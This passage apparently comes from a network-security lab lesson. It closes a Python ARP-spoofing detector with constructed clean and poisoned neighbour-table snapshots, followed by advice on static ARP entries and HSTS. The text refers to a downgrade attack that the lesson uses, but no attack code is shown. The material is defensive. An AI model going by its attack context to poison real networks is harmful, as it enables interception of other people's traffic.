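def first_poisoned(snapshots: List[str], gateway_ip: str, pinned_mac: str) -> int:
    """Index of the first snapshot that raises an alert, or -1 if none does."""
    for i, snap in enumerate(snapshots):
        if arp_alerts(parse_neigh(snap), gateway_ip, pinned_mac):
            return i
    return -1


# Constructed data: the gateway MAC as recorded on a known-good day, then
# an `ip neigh show` snapshot before and after the poisoning.
GATEWAY_IP = "192.168.8.8"
GATEWAY_MAC = "00:1a:2b:3c:4d:5e"
CLEAN = """\
192.168.8.8 dev eth0 lladdr 00:1a:2b:3c:4d:5e REACHABLE
192.168.8.25 dev eth0 lladdr 08:00:27:aa:bb:cc STALE
192.168.8.40 dev eth0 FAILED
"""
POISONED = """\
192.168.8.8 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.8.25 dev eth0 lladdr 08:00:27:aa:bb:cc STALE
192.168.8.40 dev eth0 FAILED
"""

if __name__ == "__main__":
    for label, snap in [("clean", CLEAN), ("poisoned", POISONED)]:
        print(label, arp_alerts(parse_neigh(snap), GATEWAY_IP, GATEWAY_MAC) or "ok")
```

On a lab host the check can run from cron against the live `ip neigh show` output; a static ARP entry for the gateway blocks the poisoning outright, and on the server side an HSTS header is what stops a browser from following the https-to-http downgrade the lesson relies on.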